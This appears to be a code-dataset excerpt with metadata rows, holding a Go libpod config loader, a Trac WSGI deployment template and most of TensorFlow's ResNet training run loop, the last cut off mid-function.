configBytes, err := ioutil.ReadFile(path)
if err != nil {
return nil, err
}
logrus.Debugf("Reading configuration file %q", path)
err = toml.Unmarshal(configBytes, &config)
// For the sake of backwards compat we need to check if the config fields
// with *Set suffix are set in the config. Note that the storage-related
// fields are NOT set in the config here but in the storage.conf OR directly
// by the user.
if config.VolumePath != "" {
config.VolumePathSet = true
}
if config.StaticDir != "" {
config.StaticDirSet = true
}
if config.TmpDir != "" {
config.TmpDirSet = true
}
return &config, err
}
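// Illustrative only (not shipped with libpod; the paths are example values): a
// minimal libpod.conf fragment that readConfigFromFile above would unmarshal
// into Config. The keys follow the toml tags on the Config struct.
//
//   volume_path = "/var/lib/containers/storage/volumes"
//   static_dir = "/var/lib/containers/storage/libpod"
//   tmp_dir = "/var/run/libpod"
//   cgroup_manager = "systemd"
//   runtime = "runc"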
// Write encodes the config as TOML and writes it to the specified path.
func (c *Config) Write(path string) error {
f, err := os.OpenFile(path, os.O_RDWR|os.O_CREATE, 0666)
if err != nil {
return errors.Wrapf(err, "error opening config file %q", path)
}
buffer := new(bytes.Buffer)
if err := toml.NewEncoder(buffer).Encode(c); err != nil {
return errors.Wrapf(err, "error encoding config")
}
if _, err := f.WriteString(buffer.String()); err != nil {
return errors.Wrapf(err, "error writing config %q", path)
}
return err
}
// FindConmon iterates over (*Config).ConmonPath and returns the path to the first
// (version-)matching conmon binary. If none is found, we fall back to a $PATH
// lookup of "conmon".
func (c *Config) FindConmon() (string, error) {
foundOutdatedConmon := false
for _, path := range c.ConmonPath {
stat, err := os.Stat(path)
if err != nil {
continue
}
if stat.IsDir() {
continue
}
if err := probeConmon(path); err != nil {
logrus.Warnf("Conmon at %s invalid: %v", path, err)
foundOutdatedConmon = true
continue
}
logrus.Debugf("Using conmon: %q", path)
return path, nil
}
// Search the $PATH as last fallback
if path, err := exec.LookPath("conmon"); err == nil {
if err := probeConmon(path); err != nil {
logrus.Warnf("Conmon at %s is invalid: %v", path, err)
foundOutdatedConmon = true
} else {
logrus.Debugf("Using conmon from $PATH: %q", path)
return path, nil
}
}
if foundOutdatedConmon {
return "", errors.Wrapf(define.ErrConmonOutdated,
"please update to v%d.%d.%d or later",
_conmonMinMajorVersion, _conmonMinMinorVersion, _conmonMinPatchVersion)
}
return "", errors.Wrapf(define.ErrInvalidArg,
"could not find a working conmon binary (configured options: %v)",
c.ConmonPath)
}
// probeConmon calls conmon --version and verifies it is a new enough version for
// the runtime expectations podman currently has.
func probeConmon(conmonBinary string) error {
cmd := exec.Command(conmonBinary, "--version")
var out bytes.Buffer
cmd.Stdout = &out
err := cmd.Run()
if err != nil {
return err
}
r := regexp.MustCompile(`^conmon version (?P<Major>\d+).(?P<Minor>\d+).(?P<Patch>\d+)`)
matches := r.FindStringSubmatch(out.String())
if len(matches) != 4 {
return errors.Wrap(err, _conmonVersionFormatErr)
}
major, err := strconv.Atoi(matches[1])
if err != nil {
return errors.Wrap(err, _conmonVersionFormatErr)
}
if major < _conmonMinMajorVersion {
return define.ErrConmonOutdated
}
if major > _conmonMinMajorVersion {
return nil
}
minor, err := strconv.Atoi(matches[2])
if err != nil {
return errors.Wrap(err, _conmonVersionFormatErr)
}
if minor < _conmonMinMinorVersion {
return define.ErrConmonOutdated
}
if minor > _conmonMinMinorVersion {
return nil
}
patch, err := strconv.Atoi(matches[3])
if err != nil {
return errors.Wrap(err, _conmonVersionFormatErr)
}
if patch < _conmonMinPatchVersion {
return define.ErrConmonOutdated
}
if patch > _conmonMinPatchVersion {
return nil
}
return nil
}
// NewConfig creates a new Config. It starts with an empty config and, if
// specified, merges the config at `userConfigPath`. Depending on whether we're
// running as root or rootless, we then merge the system configuration followed
// by merging the default config (hard-coded default in memory).
//
// Note that the OCI runtime is hard-set to `crun` if we're running on a system
// with cgroups v2. Other OCI runtimes do not yet support cgroups v2. This
// might change in the future.
func NewConfig(userConfigPath string) (*Config, error) {
config := &Config{} // start with an empty config
// First, try to read the user-specified config
if userConfigPath != "" {
var err error
config, err = readConfigFromFile(userConfigPath)
if err != nil {
return nil, errors.Wrapf(err, "error reading user config %q", userConfigPath)
}
}
// Now, check if the user can access system configs and merge them if needed.
if configs, err := systemConfigs(); err != nil {
return nil, errors.Wrapf(err, "error finding config on system")
} else {
migrated := false
for _, path := range configs {
systemConfig, err := readConfigFromFile(path)
if err != nil {
return nil, errors.Wrapf(err, "error reading system config %q", path)
}
// Handle CGroups v2 configuration migration.
// Migrate only the first config, and do it before
// merging.
if !migrated {
if err := cgroupV2Check(path, systemConfig); err != nil {
return nil, errors.Wrapf(err, "error rewriting configuration file %s", userConfigPath)
}
migrated = true
}
// Merge it into the config. Any unset field in config will be
// overwritten by the systemConfig.
if err := config.mergeConfig(systemConfig); err != nil {
return nil, errors.Wrapf(err, "error merging system config")
}
logrus.Debugf("Merged system config %q: %v", path, config)
}
}
// Finally, create a default config from memory and forcefully merge it into
// the config. This way we try to make sure that all fields are properly set
// and that user AND system configs can be partially set.
if defaultConfig, err := defaultConfigFromMemory(); err != nil {
return nil, errors.Wrapf(err, "error generating default config from memory")
} else {
// Check if we need to switch to cgroupfs and logger=file on rootless.
defaultConfig.checkCgroupsAndLogger()
if err := config.mergeConfig(defaultConfig); err != nil {
return nil, errors.Wrapf(err, "error merging default config from memory")
}
}
// Relative paths can cause nasty bugs, because core paths we use could
// shift between runs (or even parts of the program - the OCI runtime
// uses a different working directory than we do, for example).
if !filepath.IsAbs(config.StaticDir) {
return nil, errors.Wrapf(define.ErrInvalidArg, "static directory must be an absolute path - instead got %q", config.StaticDir)
}
if !filepath.IsAbs(config.TmpDir) {
return nil, errors.Wrapf(define.ErrInvalidArg, "temporary directory must be an absolute path - instead got %q", config.TmpDir)
}
if !filepath.IsAbs(config.VolumePath) {
return nil, errors.Wrapf(define.ErrInvalidArg, "volume path must be an absolute path - instead got %q", config.VolumePath)
}
return config, nil
}
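// exampleNewConfigUsage is a hypothetical usage sketch (not part of upstream
// libpod): load the merged configuration and log a few of the resolved fields.
func exampleNewConfigUsage() {
	cfg, err := NewConfig("") // "" means: merge only system and built-in defaults
	if err != nil {
		logrus.Errorf("loading libpod config: %v", err)
		return
	}
	logrus.Debugf("static dir: %s, tmp dir: %s, runtime: %s",
		cfg.StaticDir, cfg.TmpDir, cfg.OCIRuntime)
}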
func rootlessConfigPath() (string, error) {
home, err := util.HomeDir()
if err != nil {
return "", err
}
return filepath.Join(home, _rootlessConfigPath), nil
}
func systemConfigs() ([]string, error) {
if rootless.IsRootless() {
path, err := rootlessConfigPath()
if err != nil {
return nil, err
}
if _, err := os.Stat(path); err == nil {
return []string{path}, nil
}
return nil, err
}
configs := []string{}
if _, err := os.Stat(_rootOverrideConfigPath); err == nil {
configs = append(configs, _rootOverrideConfigPath)
}
if _, err := os.Stat(_rootConfigPath); err == nil {
configs = append(configs, _rootConfigPath)
}
return configs, nil
}
// checkCgroupsAndLogger checks if we're running rootless with the systemd
// cgroup manager. In case the user session isn't available, we're switching the
// cgroup manager to cgroupfs and the events logger backend to 'file'.
// Note, this only applies to rootless.
func (c *Config) checkCgroupsAndLogger() {
if !rootless.IsRootless() || (c.CgroupManager !=
define.SystemdCgroupsManager && c.EventsLogger == "file") {
return
}
session := os.Getenv("DBUS_SESSION_BUS_ADDRESS")
hasSession := session != ""
if hasSession && strings.HasPrefix(session, "unix:path=") {
_, err := os.Stat(strings.TrimPrefix(session, "unix:path="))
hasSession = err == nil
}
if !hasSession {
logrus.Warningf("The cgroups manager is set to systemd but there is no systemd user session available")
logrus.Warningf("To use systemd, you may need to log in using a user session")
logrus.Warningf("Alternatively, you can enable lingering with: `loginctl enable-linger %d` (possibly as root)", rootless.GetRootlessUID())
logrus.Warningf("Falling back to --cgroup-manager=cgroupfs and --events-backend=file")
c.CgroupManager = define.CgroupfsCgroupsManager
c.EventsLogger = "file"
}
}
// Since runc does not currently support cgroup v2, change the default runtime
// to crun the first time libpod.conf is processed after an upgrade.
// TODO: once runc supports cgroup v2, this function should be removed.
func cgroupV2Check(configPath string, tmpConfig *Config) error {
if !tmpConfig.CgroupCheck && rootless.IsRootless() {
logrus.Debugf("Rewriting %s for CGroup v2 upgrade", configPath)
cgroupsV2, err := cgroups.IsCgroup2UnifiedMode()
if err != nil {
return err
}
if cgroupsV2 {
path, err := exec.LookPath("crun")
if err != nil {
logrus.Warnf("Cannot find the crun package on the host; containers might fail to run on cgroup v2 systems without crun: %q", err)
// Can't find crun path so do nothing
return nil
}
tmpConfig.CgroupCheck = true
tmpConfig.OCIRuntime = path
if err := tmpConfig.Write(configPath); err != nil {
return err
}
}
}
return nil
}
|
[
"\"DBUS_SESSION_BUS_ADDRESS\""
] |
[] |
[
"DBUS_SESSION_BUS_ADDRESS"
] |
[]
|
["DBUS_SESSION_BUS_ADDRESS"]
|
go
| 1 | 0 | |
trac/web/templates/deploy_trac.wsgi
|
{##}#!${executable}
{##}# -*- coding: utf-8 -*-
{##}#
{##}# Copyright (C)2008-2009 Edgewall Software
{##}# Copyright (C) 2008 Noah Kantrowitz <[email protected]>
{##}# All rights reserved.
{##}#
{##}# This software is licensed as described in the file COPYING, which
{##}# you should have received as part of this distribution. The terms
{##}# are also available at http://trac.edgewall.org/wiki/TracLicense.
{##}#
{##}# This software consists of voluntary contributions made by many
{##}# individuals. For the exact contribution history, see the revision
{##}# history and logs, available at http://trac.edgewall.org/log/.
{##}#
{##}# Author: Noah Kantrowitz <[email protected]>
import os
def application(environ, start_request):
if not 'trac.env_parent_dir' in environ:
environ.setdefault('trac.env_path', ${repr(env.path)})
if 'PYTHON_EGG_CACHE' in environ:
os.environ['PYTHON_EGG_CACHE'] = environ['PYTHON_EGG_CACHE']
elif 'trac.env_path' in environ:
os.environ['PYTHON_EGG_CACHE'] = \
os.path.join(environ['trac.env_path'], '.egg-cache')
elif 'trac.env_parent_dir' in environ:
os.environ['PYTHON_EGG_CACHE'] = \
os.path.join(environ['trac.env_parent_dir'], '.egg-cache')
from trac.web.main import dispatch_request
return dispatch_request(environ, start_request)
|
[] |
[] |
[
"PYTHON_EGG_CACHE"
] |
[]
|
["PYTHON_EGG_CACHE"]
|
python
| 1 | 0 | |
official/resnet/resnet_run_loop.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Contains utility and supporting functions for ResNet.
This module contains ResNet code which does not directly build layers. This
includes dataset management, hyperparameter and optimizer code, and argument
parsing. Code for defining the ResNet layers can be found in resnet_model.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import multiprocessing
import os
# pylint: disable=g-bad-import-order
from absl import flags
import tensorflow as tf
from tensorflow.contrib.data.python.ops import threadpool
from official.resnet import resnet_model
from official.utils.flags import core as flags_core
from official.utils.export import export
from official.utils.logs import hooks_helper
from official.utils.logs import logger
from official.resnet import imagenet_preprocessing
from official.utils.misc import distribution_utils
from official.utils.misc import model_helpers
################################################################################
# Functions for input processing.
################################################################################
def process_record_dataset(dataset,
is_training,
batch_size,
shuffle_buffer,
parse_record_fn,
num_epochs=1,
dtype=tf.float32,
datasets_num_private_threads=None,
num_parallel_batches=1):
"""Given a Dataset with raw records, return an iterator over the records.
Args:
dataset: A Dataset representing raw records
is_training: A boolean denoting whether the input is for training.
batch_size: The number of samples per batch.
shuffle_buffer: The buffer size to use when shuffling records. A larger
value results in better randomness, but smaller values reduce startup
time and use less memory.
parse_record_fn: A function that takes a raw record and returns the
corresponding (image, label) pair.
num_epochs: The number of epochs to repeat the dataset.
dtype: Data type to use for images/features.
datasets_num_private_threads: Number of threads for a private
threadpool created for all datasets computation.
num_parallel_batches: Number of parallel batches for tf.data.
Returns:
Dataset of (image, label) pairs ready for iteration.
"""
# Prefetches a batch at a time to smooth out the time taken to load input
# files for shuffling and processing.
dataset = dataset.prefetch(buffer_size=batch_size)
if is_training:
# Shuffles records before repeating to respect epoch boundaries.
dataset = dataset.shuffle(buffer_size=shuffle_buffer)
# Repeats the dataset for the number of epochs to train.
dataset = dataset.repeat(num_epochs)
# Parses the raw records into images and labels.
dataset = dataset.apply(
tf.data.experimental.map_and_batch(
lambda value: parse_record_fn(value, is_training, dtype),
batch_size=batch_size,
num_parallel_batches=num_parallel_batches,
drop_remainder=False))
# Operations between the final prefetch and the get_next call to the iterator
# will happen synchronously during run time. We prefetch here again to
# background all of the above processing work and keep it out of the
# critical training path. Setting buffer_size to tf.data.experimental.AUTOTUNE
# allows DistributionStrategies to adjust how many batches to fetch based
# on how many devices are present.
dataset = dataset.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
# Defines a specific size thread pool for tf.data operations.
if datasets_num_private_threads:
tf.compat.v1.logging.info('datasets_num_private_threads: %s',
datasets_num_private_threads)
dataset = threadpool.override_threadpool(
dataset,
threadpool.PrivateThreadPool(
datasets_num_private_threads,
display_name='input_pipeline_thread_pool'))
return dataset
def get_synth_input_fn(height, width, num_channels, num_classes,
dtype=tf.float32):
"""Returns an input function that returns a dataset with random data.
This input_fn returns a data set that iterates over a set of random data and
bypasses all preprocessing, e.g. jpeg decode and copy. The host to device
copy is still included. This is used to find the upper throughput bound when
tuning the full input pipeline.
Args:
height: Integer height that will be used to create a fake image tensor.
width: Integer width that will be used to create a fake image tensor.
num_channels: Integer depth that will be used to create a fake image tensor.
num_classes: Number of classes that should be represented in the fake labels
tensor
dtype: Data type for features/images.
Returns:
An input_fn that can be used in place of a real one to return a dataset
that can be used for iteration.
"""
# pylint: disable=unused-argument
def input_fn(is_training, data_dir, batch_size, *args, **kwargs):
"""Returns dataset filled with random data."""
# Synthetic input should be within [0, 255].
inputs = tf.random.truncated_normal(
[batch_size] + [height, width, num_channels],
dtype=dtype,
mean=127,
stddev=60,
name='synthetic_inputs')
labels = tf.random.uniform(
[batch_size],
minval=0,
maxval=num_classes - 1,
dtype=tf.int32,
name='synthetic_labels')
data = tf.data.Dataset.from_tensors((inputs, labels)).repeat()
data = data.prefetch(buffer_size=tf.data.experimental.AUTOTUNE)
return data
return input_fn
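# Illustrative sketch (hypothetical values, not part of the original script):
# building a synthetic, ImageNet-shaped input_fn and drawing batches from it.
#
#   synth_input_fn = get_synth_input_fn(224, 224, 3, num_classes=1001,
#                                       dtype=tf.float16)
#   dataset = synth_input_fn(is_training=True, data_dir=None, batch_size=32)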
def image_bytes_serving_input_fn(image_shape, dtype=tf.float32):
"""Serving input fn for raw jpeg images."""
def _preprocess_image(image_bytes):
"""Preprocess a single raw image."""
# Bounding box around the whole image.
bbox = tf.constant([0.0, 0.0, 1.0, 1.0], dtype=dtype, shape=[1, 1, 4])
height, width, num_channels = image_shape
image = imagenet_preprocessing.preprocess_image(
image_bytes, bbox, height, width, num_channels, is_training=False)
return image
image_bytes_list = tf.compat.v1.placeholder(
shape=[None], dtype=tf.string, name='input_tensor')
images = tf.map_fn(
_preprocess_image, image_bytes_list, back_prop=False, dtype=dtype)
return tf.estimator.export.TensorServingInputReceiver(
images, {'image_bytes': image_bytes_list})
def override_flags_and_set_envars_for_gpu_thread_pool(flags_obj):
"""Override flags and set env_vars for performance.
These settings exist to test the difference between using stock settings
and manual tuning. They also show some of the environment variables that can be tweaked to
squeeze a few extra examples per second. These settings are defaulted to the
current platform of interest, which changes over time.
On systems with small numbers of cpu cores, e.g. under 8 logical cores,
setting up a gpu thread pool with `tf_gpu_thread_mode=gpu_private` may perform
poorly.
Args:
flags_obj: Current flags, which will be adjusted possibly overriding
what has been set by the user on the command-line.
"""
cpu_count = multiprocessing.cpu_count()
tf.compat.v1.logging.info('Logical CPU cores: %s', cpu_count)
# Sets up thread pool for each GPU for op scheduling.
per_gpu_thread_count = 1
total_gpu_thread_count = per_gpu_thread_count * flags_obj.num_gpus
os.environ['TF_GPU_THREAD_MODE'] = flags_obj.tf_gpu_thread_mode
os.environ['TF_GPU_THREAD_COUNT'] = str(per_gpu_thread_count)
tf.compat.v1.logging.info('TF_GPU_THREAD_COUNT: %s',
os.environ['TF_GPU_THREAD_COUNT'])
tf.compat.v1.logging.info('TF_GPU_THREAD_MODE: %s',
os.environ['TF_GPU_THREAD_MODE'])
# Reduces general thread pool by number of threads used for GPU pool.
main_thread_count = cpu_count - total_gpu_thread_count
flags_obj.inter_op_parallelism_threads = main_thread_count
# Sets the thread count for tf.data: logical cores minus the threads assigned
# to the private GPU pool, along with 2 threads per GPU for event monitoring
# and sending / receiving tensors.
num_monitoring_threads = 2 * flags_obj.num_gpus
flags_obj.datasets_num_private_threads = (cpu_count - total_gpu_thread_count
- num_monitoring_threads)
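# Worked example (hypothetical hardware, not part of the original script): on a
# host with 96 logical cores and 8 GPUs, the function above sets
#   total_gpu_thread_count       = 1 * 8 = 8
#   inter_op_parallelism_threads = 96 - 8 = 88
#   datasets_num_private_threads = 96 - 8 - 2 * 8 = 72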
################################################################################
# Functions for running training/eval/validation loops for the model.
################################################################################
def learning_rate_with_decay(
batch_size, batch_denom, num_images, boundary_epochs, decay_rates,
base_lr=0.1, warmup=False):
"""Get a learning rate that decays step-wise as training progresses.
Args:
batch_size: the number of examples processed in each training batch.
batch_denom: this value will be used to scale the base learning rate.
`0.1 * batch size` is divided by this number, such that when
batch_denom == batch_size, the initial learning rate will be 0.1.
num_images: total number of images that will be used for training.
boundary_epochs: list of ints representing the epochs at which we
decay the learning rate.
decay_rates: list of floats representing the decay rates to be used
for scaling the learning rate. It should have one more element
than `boundary_epochs`, and all elements should have the same type.
base_lr: Initial learning rate scaled based on batch_denom.
warmup: Run a 5 epoch warmup to the initial lr.
Returns:
Returns a function that takes a single argument - the number of batches
trained so far (global_step)- and returns the learning rate to be used
for training the next batch.
"""
initial_learning_rate = base_lr * batch_size / batch_denom
batches_per_epoch = num_images / batch_size
# Reduce the learning rate at certain epochs.
# CIFAR-10: divide by 10 at epoch 100, 150, and 200
# ImageNet: divide by 10 at epoch 30, 60, 80, and 90
boundaries = [int(batches_per_epoch * epoch) for epoch in boundary_epochs]
vals = [initial_learning_rate * decay for decay in decay_rates]
def learning_rate_fn(global_step):
"""Builds scaled learning rate function with 5 epoch warm up."""
lr = tf.compat.v1.train.piecewise_constant(global_step, boundaries, vals)
if warmup:
warmup_steps = int(batches_per_epoch * 5)
warmup_lr = (
initial_learning_rate * tf.cast(global_step, tf.float32) / tf.cast(
warmup_steps, tf.float32))
return tf.cond(pred=global_step < warmup_steps,
true_fn=lambda: warmup_lr,
false_fn=lambda: lr)
return lr
return learning_rate_fn
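# Illustrative sketch (the values are assumptions, not taken from this file):
# an ImageNet-style schedule where the base learning rate of 0.1 is divided by
# 10 at each boundary epoch, matching the comment inside the function above.
#
#   lr_fn = learning_rate_with_decay(
#       batch_size=256, batch_denom=256, num_images=1281167,
#       boundary_epochs=[30, 60, 80, 90],
#       decay_rates=[1, 0.1, 0.01, 0.001, 1e-4])
#   learning_rate = lr_fn(tf.compat.v1.train.get_or_create_global_step())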
def resnet_model_fn(features, labels, mode, model_class,
resnet_size, weight_decay, learning_rate_fn, momentum,
data_format, resnet_version, loss_scale,
loss_filter_fn=None, dtype=resnet_model.DEFAULT_DTYPE,
fine_tune=False):
"""Shared functionality for different resnet model_fns.
Initializes the ResnetModel representing the model layers
and uses that model to build the necessary EstimatorSpecs for
the `mode` in question. For training, this means building losses,
the optimizer, and the train op that get passed into the EstimatorSpec.
For evaluation and prediction, the EstimatorSpec is returned without
a train op, but with the necessary parameters for the given mode.
Args:
features: tensor representing input images
labels: tensor representing class labels for all input images
mode: current estimator mode; should be one of
`tf.estimator.ModeKeys.TRAIN`, `EVALUATE`, `PREDICT`
model_class: a class representing a TensorFlow model that has a __call__
function. We assume here that this is a subclass of ResnetModel.
resnet_size: A single integer for the size of the ResNet model.
weight_decay: weight decay loss rate used to regularize learned variables.
learning_rate_fn: function that returns the current learning rate given
the current global_step
momentum: momentum term used for optimization
data_format: Input format ('channels_last', 'channels_first', or None).
If set to None, the format is dependent on whether a GPU is available.
resnet_version: Integer representing which version of the ResNet network to
use. See README for details. Valid values: [1, 2]
loss_scale: The factor to scale the loss for numerical stability. A detailed
summary is present in the arg parser help text.
loss_filter_fn: function that takes a string variable name and returns
True if the var should be included in loss calculation, and False
otherwise. If None, batch_normalization variables will be excluded
from the loss.
dtype: the TensorFlow dtype to use for calculations.
fine_tune: If True only train the dense layers(final layers).
Returns:
EstimatorSpec parameterized according to the input params and the
current mode.
"""
# Generate a summary node for the images
tf.compat.v1.summary.image('images', features, max_outputs=6)
# Checks that features/images have same data type being used for calculations.
assert features.dtype == dtype
model = model_class(resnet_size, data_format, resnet_version=resnet_version,
dtype=dtype)
logits = model(features, mode == tf.estimator.ModeKeys.TRAIN)
# This acts as a no-op if the logits are already in fp32 (provided logits are
# not a SparseTensor). If dtype is low precision, logits must be cast to
# fp32 for numerical stability.
logits = tf.cast(logits, tf.float32)
predictions = {
'classes': tf.argmax(input=logits, axis=1),
'probabilities': tf.nn.softmax(logits, name='softmax_tensor')
}
if mode == tf.estimator.ModeKeys.PREDICT:
# Return the predictions and the specification for serving a SavedModel
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
export_outputs={
'predict': tf.estimator.export.PredictOutput(predictions)
})
# Calculate loss, which includes softmax cross entropy and L2 regularization.
cross_entropy = tf.compat.v1.losses.sparse_softmax_cross_entropy(
logits=logits, labels=labels)
# Create a tensor named cross_entropy for logging purposes.
tf.identity(cross_entropy, name='cross_entropy')
tf.compat.v1.summary.scalar('cross_entropy', cross_entropy)
# If no loss_filter_fn is passed, assume we want the default behavior,
# which is that batch_normalization variables are excluded from loss.
def exclude_batch_norm(name):
return 'batch_normalization' not in name
loss_filter_fn = loss_filter_fn or exclude_batch_norm
# Add weight decay to the loss.
l2_loss = weight_decay * tf.add_n(
# loss is computed using fp32 for numerical stability.
[tf.nn.l2_loss(tf.cast(v, tf.float32))
for v in tf.compat.v1.trainable_variables() if loss_filter_fn(v.name)])
tf.compat.v1.summary.scalar('l2_loss', l2_loss)
loss = cross_entropy + l2_loss
if mode == tf.estimator.ModeKeys.TRAIN:
global_step = tf.compat.v1.train.get_or_create_global_step()
learning_rate = learning_rate_fn(global_step)
# Create a tensor named learning_rate for logging purposes
tf.identity(learning_rate, name='learning_rate')
tf.compat.v1.summary.scalar('learning_rate', learning_rate)
optimizer = tf.compat.v1.train.MomentumOptimizer(
learning_rate=learning_rate,
momentum=momentum
)
def _dense_grad_filter(gvs):
"""Only apply gradient updates to the final layer.
This function is used for fine tuning.
Args:
gvs: list of tuples with gradients and variable info
Returns:
filtered gradients so that only the dense layer remains
"""
return [(g, v) for g, v in gvs if 'dense' in v.name]
if loss_scale != 1:
# When computing fp16 gradients, often intermediate tensor values are
# so small, they underflow to 0. To avoid this, we multiply the loss by
# loss_scale to make these tensor values loss_scale times bigger.
scaled_grad_vars = optimizer.compute_gradients(loss * loss_scale)
if fine_tune:
scaled_grad_vars = _dense_grad_filter(scaled_grad_vars)
# Once the gradient computation is complete we can scale the gradients
# back to the correct scale before passing them to the optimizer.
unscaled_grad_vars = [(grad / loss_scale, var)
for grad, var in scaled_grad_vars]
minimize_op = optimizer.apply_gradients(unscaled_grad_vars, global_step)
else:
grad_vars = optimizer.compute_gradients(loss)
if fine_tune:
grad_vars = _dense_grad_filter(grad_vars)
minimize_op = optimizer.apply_gradients(grad_vars, global_step)
update_ops = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.UPDATE_OPS)
train_op = tf.group(minimize_op, update_ops)
else:
train_op = None
accuracy = tf.compat.v1.metrics.accuracy(labels, predictions['classes'])
accuracy_top_5 = tf.compat.v1.metrics.mean(
tf.nn.in_top_k(predictions=logits, targets=labels, k=5, name='top_5_op'))
metrics = {'accuracy': accuracy,
'accuracy_top_5': accuracy_top_5}
# Create a tensor named train_accuracy for logging purposes
tf.identity(accuracy[1], name='train_accuracy')
tf.identity(accuracy_top_5[1], name='train_accuracy_top_5')
tf.compat.v1.summary.scalar('train_accuracy', accuracy[1])
tf.compat.v1.summary.scalar('train_accuracy_top_5', accuracy_top_5[1])
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metric_ops=metrics)
def resnet_main(
flags_obj, model_function, input_function, dataset_name, shape=None):
"""Shared main loop for ResNet Models.
Args:
flags_obj: An object containing parsed flags. See define_resnet_flags()
for details.
model_function: the function that instantiates the Model and builds the
ops for train/eval. This will be passed directly into the estimator.
input_function: the function that processes the dataset and returns a
dataset that the estimator can train on. This will be wrapped with
all the relevant flags for running and passed to estimator.
dataset_name: the name of the dataset for training and evaluation. This is
used for logging purposes.
shape: list of ints representing the shape of the images used for training.
This is only used if flags_obj.export_dir is passed.
Returns:
Dict of results of the run.
"""
model_helpers.apply_clean(flags.FLAGS)
# Ensures flag override logic is only executed if explicitly triggered.
if flags_obj.tf_gpu_thread_mode:
override_flags_and_set_envars_for_gpu_thread_pool(flags_obj)
# Creates session config. allow_soft_placement = True is required for
# multi-GPU and is not harmful for other modes.
session_config = tf.compat.v1.ConfigProto(
inter_op_parallelism_threads=flags_obj.inter_op_parallelism_threads,
intra_op_parallelism_threads=flags_obj.intra_op_parallelism_threads,
allow_soft_placement=True)
distribution_strategy = distribution_utils.get_distribution_strategy(
flags_core.get_num_gpus(flags_obj), flags_obj.all_reduce_alg)
# Creates a `RunConfig` that checkpoints every 24 hours which essentially
# results in checkpoints determined only by `epochs_between_evals`.
run_config = tf.estimator.RunConfig(
train_distribute=distribution_strategy,
session_config=session_config,
save_checkpoints_secs=60*60*24)
# Initializes model with all but the dense layer from pretrained ResNet.
if flags_obj.pretrained_model_checkpoint_path is not None:
warm_start_settings = tf.estimator.WarmStartSettings(
flags_obj.pretrained_model_checkpoint_path,
vars_to_warm_start='^(?!.*dense)')
else:
warm_start_settings = None
classifier = tf.estimator.Estimator(
model_fn=model_function, model_dir=flags_obj.model_dir, config=run_config,
warm_start_from=warm_start_settings, params={
'resnet_size': int(flags_obj.resnet_size),
'data_format': flags_obj.data_format,
'batch_size': flags_obj.batch_size,
'resnet_version': int(flags_obj.resnet_version),
'loss_scale': flags_core.get_loss_scale(flags_obj),
'dtype': flags_core.get_tf_dtype(flags_obj),
'fine_tune': flags_obj.fine_tune
})
run_params = {
'batch_size': flags_obj.batch_size,
'dtype': flags_core.get_tf_dtype(flags_obj),
'resnet_size': flags_obj.resnet_size,
'resnet_version': flags_obj.resnet_version,
'synthetic_data': flags_obj.use_synthetic_data,
'train_epochs': flags_obj.train_epochs,
}
if flags_obj.use_synthetic_data:
dataset_name = dataset_name + '-synthetic'
benchmark_logger = logger.get_benchmark_logger()
benchmark_logger.log_run_info('resnet', dataset_name, run_params,
test_id=flags_obj.benchmark_test_id)
train_hooks = hooks_helper.get_train_hooks(
flags_obj.hooks,
model_dir=flags_obj.model_dir,
batch_size=flags_obj.batch_size)
def input_fn_train(num_epochs):
return input_function(
is_training=True,
data_dir=flags_obj.data_dir,
batch_size=distribution_utils.per_device_batch_size(
flags_obj.batch_size, flags_core.get_num_gpus(flags_obj)),
num_epochs=num_epochs,
dtype=flags_core.get_tf_dtype(flags_obj),
datasets_num_private_threads=flags_obj.datasets_num_private_threads,
num_parallel_batches=flags_obj.datasets_num_parallel_batches)
def input_fn_eval():
return input_function(
is_training=False,
data_dir=flags_obj.data_dir,
batch_size=distribution_utils.per_device_batch_size(
flags_obj.batch_size, flags_core.get_num_gpus(flags_obj)),
num_epochs=1,
dtype=flags_core.get_tf_dtype(flags_obj))
if flags_obj.eval_only or not flags_obj.train_epochs:
# If --eval_only is set, perform a single loop with zero train epochs.
schedule, n_loops = [0], 1
else:
# Compute the number of times to loop while training. All but the last
# pass will train for `epochs_between_evals` epochs, while the last will
# train for the number needed to reach `train_epochs`. For instance if
# train_epochs = 25 and epochs_between_evals = 10
# schedule will be set to [10, 10, 5]. That is to say, the loop will:
# Train for 10 epochs and then evaluate.
# Train for another 10 epochs and then evaluate.
# Train for a final 5 epochs (to reach 25 epochs) and then evaluate.
n_loops = math.ceil(flags_obj.train_epochs / flags_obj.epochs_between_evals)
schedule = [flags_obj.epochs_between_evals for _ in range(int(n_loops))]
schedule[-1] = flags_obj.train_epochs - sum(schedule[:-1])  # guard against over-counting.
for cycle_index, num_train_epochs in enumerate(schedule):
tf.compat.v1.logging.info('Starting cycle: %d/%d', cycle_index,
int(n_loops))
if num_train_epochs:
classifier.train(input_fn=lambda: input_fn_train(num_train_epochs),
hooks=train_hooks, max_steps=flags_obj.max_train_steps)
tf.compat.v1.logging.info('Starting to evaluate.')
# flags_obj.max_train_steps is generally associated with testing and
# profiling. As a result it is frequently called with synthetic data, which
# will iterate forever. Passing steps=flags_obj.max_train_steps allows the
# eval (which is generally unimportant in those circumstances) to terminate.
# Note that eval will run for max_train_steps each loop, regardless of the
# global_step count.
eval_results = classifier.evaluate(input_fn=input_fn_eval,
steps=flags_obj.max_train_steps)
benchmark_logger.log_evaluation_result(eval_results)
if model_helpers.past_stop_threshold(
flags_obj.stop_threshold, eval_results['accuracy']):
break
if flags_obj.export_dir is not None:
# Exports a saved model for the given classifier.
export_dtype = flags_core.get_tf_dtype(flags_obj)
if flags_obj.image_bytes_as_serving_input:
input_receiver_fn = functools.partial(
image_bytes_serving_input_fn, shape, dtype=export_dtype)
else:
input_receiver_fn = export.build_tensor_serving_input_receiver_fn(
shape, batch_size=flags_obj.batch_size, dtype=export_dtype)
